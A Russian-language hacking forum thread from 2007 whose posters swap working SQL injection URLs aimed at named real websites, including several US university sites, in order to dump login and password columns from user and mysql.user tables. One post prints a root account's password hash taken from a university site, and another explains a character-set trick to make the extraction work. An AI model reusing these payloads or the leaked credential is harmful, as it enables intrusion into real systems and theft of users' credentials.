HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 16.06.2007, 08:38
KPOT_f!nd
Познавший АНТИЧАТ
Регистрация: 25.08.2006
Сообщений: 1,524
С нами: 10374086

Репутация: 1745


По умолчанию

Код:
http://www.music3000.com.ua/?p=club&sp=news&id=-348+union+select+concat(login,char(58),pass)+from+users/*

Последний раз редактировалось KPOT_f!nd; 16.06.2007 в 08:41..
 
Ответить с цитированием

  #2  
Старый 16.06.2007, 11:13
LoneWolf666
Постоянный
Регистрация: 09.12.2005
Сообщений: 377
С нами: 10747046

Репутация: 362
По умолчанию

http://www.xclan.ru/showthread.php?t=425
дак это кто из вас нашёл то?
а так +
 
Ответить с цитированием

  #3  
Старый 16.06.2007, 13:21
random
Познающий
Регистрация: 05.09.2006
Сообщений: 50
С нами: 10357689

Репутация: 250
По умолчанию

Код:
http://www.vigray.ru/heading/index.php?iid=-237+union+select+1,2,concat(login,0x3a,pass),4,5,6,7+from+users/*
Код:
http://tutvsesvoi.ru/index.php?do=info&iID=-10+union+select+1,version(),3,4,5,6/*
 
Ответить с цитированием

  #4  
Старый 16.06.2007, 16:51
Ky3bMu4
Постоянный
Регистрация: 03.02.2007
Сообщений: 520
С нами: 10140806

Репутация: 932


По умолчанию

yahoo - рулез!
yahoo`ярю! (с)
Всё - .edu !
Код:
http://www.skio.peachnet.edu/resources/library/serials.php?action=view&print=1&id=-57+union+select+version(),user()/* 
http://www.ksg.harvard.edu/iop/students_internships_db.php?action=id&id=-5+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25/* - PR 8  

http://journalism.berkeley.edu/events/details.php?ID=-322+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,

22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54/*
http://alliance.la.asu.edu/azga/lp_view.php?lesson_id=-390+union+select+version()/* - в самом низу
http://www.loyno.edu/civildiscourse/journal.php?action=article_view&topic_id=4&article_id=-5+union+select+1,2,3,4,5,6,7,8,9,10,11,12+from+mysql.user/*
У многих есть доступ к таблице user, PR от 4 до 8. Разбирайте!

Спасибо огромное Isis!!! Сладенькое:
http://www.library.vcu.edu/ - PR 6

Код:
http://www.library.vcu.edu/whatsnew/news_result.cfm?ID=-744+union+select+1,2,convert(concat_ws(0x3b,password,user)using%20latin1),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19+from+mysql.user
User: root
Password: 3f378de07c02b3c4


P.S.
Эээ... а что означает вывод:
Цитата:
General error: Illegal mix of collations (latin1_swedish_ci,IMPLICIT) and (utf8_general_ci,SYSCONST) for operation 'UNION'
???

Последний раз редактировалось Ky3bMu4; 16.06.2007 в 17:19..
 
Ответить с цитированием

  #5  
Старый 16.06.2007, 17:08
Isis
Флудер
Регистрация: 20.11.2006
Сообщений: 3,315
С нами: 10248806

Репутация: 2371


По умолчанию

Цитата:
P.S.
Эээ... а что означает вывод:
Цитата:
General error: Illegal mix of collations (latin1_swedish_ci,IMPLICIT) and (utf8_general_ci,SYSCONST) for operation 'UNION'
Это означает что вывод нужен в кодировке latin1
Код:
convert(concat_ws(0x3b,version(),user(),database()) using latin1)
 
Ответить с цитированием

  #6  
Старый 16.06.2007, 20:04
genom--
Постоянный
Регистрация: 09.07.2006
Сообщений: 937
С нами: 10441826

Репутация: 1686


По умолчанию

http://www.autosave-scotland.co.uk/%20shop/choose_model.php?manID='
www.qmul.ac.uk/courses/department.php?dept_id='
www.wilkinson-sword.co.uk/index.php?id='
 
Ответить с цитированием

  #7  
Старый 16.06.2007, 21:39
Серенький
Banned
Регистрация: 13.04.2007
Сообщений: 123
С нами: 10041506

Репутация: 572
По умолчанию

Цитата:
random
http://tutvsesvoi.ru/index.php?do=info&iID=-10+union+select+1,version(),3,4,5,6/*
http://tutvsesvoi.ru/index.php?do=info&iID=-10+union+select+1,concat_ws(0x203a20,aID,aName,aPa ss,aEmail),3,4,5,6+from+tutvsesv_tvs.tvs_auth+limi t+0,1/*
 
Ответить с цитированием

  #8  
Старый 16.06.2007, 22:54
hitex
Новичок
Регистрация: 25.05.2007
Сообщений: 16
С нами: 9980343

Репутация: 26
По умолчанию

Код:
http://ts.motronline.com/login.php?detail='+union+select+1,2,3,4,5,6,7,8,9,10,11,12,concat_ws(0x203a20,admin_id,admin_pass),14,15,16,17,18,19,20,21,22,23+from+gllcts2_admin+limit+0,50/*
http://www.bridgewater.edu/index.php?id=-857+union+select+1,2,3,4,5,6,7,aes_decrypt(aes_encrypt(concat_ws(0x3a,id,username,password),31337),31337),9,10,11,12,13,14,15,16,17,18,19,20+from+users+limit+17,3/*
 
Ответить с цитированием

  #9  
Старый 17.06.2007, 01:26
Spyder
Members of Antichat - Level 5
Регистрация: 09.10.2006
Сообщений: 1,698
С нами: 10309346

Репутация: 4303


По умолчанию

Цитата:
http://www.technepress.nl/publications.php?id=-19+union+select+1,convert(version()+using+latin1), 3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19/*
=)
 
Ответить с цитированием

  #10  
Старый 17.06.2007, 01:40
SWAT
Участник форума
Регистрация: 14.12.2006
Сообщений: 211
С нами: 10214321

Репутация: 552
По умолчанию

http://www.ciritas.ru/product.php?id=-10+union+select+1,2,id,4,name,6,7,8,9+from+client/*
 
Ответить с цитированием
Ответ





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.